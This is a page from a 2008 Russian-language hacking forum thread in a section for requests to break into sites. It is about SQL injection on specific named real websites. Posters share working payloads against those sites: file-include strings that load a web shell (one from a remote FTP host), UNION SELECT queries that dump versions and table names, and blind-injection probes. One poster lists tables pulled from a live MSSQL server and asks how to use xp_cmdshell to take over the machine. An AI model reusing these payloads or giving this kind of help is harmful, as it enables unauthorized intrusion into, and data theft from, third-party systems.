HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 31 из 41 « Первая < 21 27 28 29 30 31 32 33 34 35 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #301  
Старый 07.09.2008, 13:12
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию
Цитата:
Сообщение от OMG!!  
Помогите
http://www.klax.tula.ru/index.php3?content=[sql]

Это не sql это инклуд локальный. Если есть возможность залить картинку-shell в папку на сайте например /img то инклуд будет выглядеть так

http://www.klax.tula.ru/index.php3?content=../../../../../img/pic.jpg%00
Последний раз редактировалось truelamer; 07.09.2008 в 13:15..
 

  #302  
Старый 07.09.2008, 15:29
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
это не локальный инклуд, а удаленный. хттп фильттруется, остальное в том числе фтп - нет. http://www.klax.tula.ru/index.php3?content=ftp://наш_фтп/shell.txt
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #303  
Старый 16.09.2008, 15:13
dArKkNiGHt
Новичок
Регистрация: 18.08.2008
Сообщений: 8
Провел на форуме:
56704

Репутация: 5
Question
PHP код:
http://r15.com.ua/disk.php?producer=&radius=&pcd=&c=20&p=40'[sql] 
как ни борюсь, а получаю
Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in
плииз, помогите подобрать колонки и их типы.
 

Что дальше?
  #304  
Старый 17.09.2008, 16:14
Yaniska
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
Question Что дальше?
Адрес:
Код:
http://www.it-sys.ru/itsys.cgi?id=-12+'
Пашет на:
Код:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.it-sys.ru/itsys.cgi?id=-12+union+ALL+select+null,null,null,@@version,null, null,null

Есть следующие таблицы:
Код:
Banners
BottomString
Counters
Currency
dtproperties
Feedback
Menu
Price
PriceCategories
PricePoints
RightMenu
sysconstraints
syssegments
UpperString
узнавать структуру не стал — не интересно, а вот другие таблицы порыл:
Код:
Users(Id, Name, Permissions)
master..syslogins(constid, id, colid, spare1, status, actions, error)
SysUsers(uid, status, name, sid, roles, createdate, updatedate, altuid, password, gid, environ, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole)
USER = dbo

Пароль на базу хранится как-то странно — в общем не смог его извлечь.

На большее знаний не хватило Я совсем зелёный в sql-inj.

Заюзать xp_cmdshell (да и BULK INSERT тоже) не получилось, потому и спрашиваю: как прорваться дальше на тачку?
 

  #305  
Старый 04.10.2008, 12:27
telas
Новичок
Регистрация: 17.09.2008
Сообщений: 4
Провел на форуме:
105082

Репутация: 0
По умолчанию
Есть идеи по поводу использования???
http://santimaizsole.lv/Скоро+на+аукционе/id/74/offset/2/
 

  #306  
Старый 04.11.2008, 08:52
pingvincible
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983

Репутация: 5
По умолчанию
http://www.rudtp.ru/lib.php?id=2[sql] если можно, то подробно описать,Ючто с этим можно сделать?
 

  #307  
Старый 04.11.2008, 09:34
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию
Цитата:
Сообщение от pingvincible  
http://www.rudtp.ru/lib.php?id=2[sql] если можно, то подробно описать,Ючто с этим можно сделать?
интересная вещица.. но сейчас утро, спать хочется...
Цитата:
http://www.rudtp.ru/lib.php?id=1+and+substring(version(),1,1)=3+--+
собственно версия мускула третья...
 

  #308  
Старый 04.11.2008, 13:35
pingvincible
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983

Репутация: 5
По умолчанию
Цитата:
Сообщение от gisTy  
...собственно версия мускула третья...
о, интересно, понял, откуда такое умозаключение так если версия третья, то, union не работает, так? количество столбцов я могу определить:

Код:
http://www.rudtp.ru/lib.php?id=2+group+by+2+--+
а названия столбцов подобрать как?
и еще, получается, что это слепая инъекция???
Последний раз редактировалось pingvincible; 04.11.2008 в 14:40..
 

  #309  
Старый 05.11.2008, 16:46
pingvincible
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983

Репутация: 5
По умолчанию
Код:
http://www.datingfunda.com/webadmin/login.php[sql]
Последний раз редактировалось pingvincible; 05.11.2008 в 16:48..
 

  #310  
Старый 08.11.2008, 10:41
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Код:
http://www.datingfunda.com/photos/photos_by_album.php?album_id=-1+union+select+table_name,2+from+information_schema.tables+limit+17,1--
 
 
Страница 31 из 41 « Первая < 21 27 28 29 30 31 32 33 34 35 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ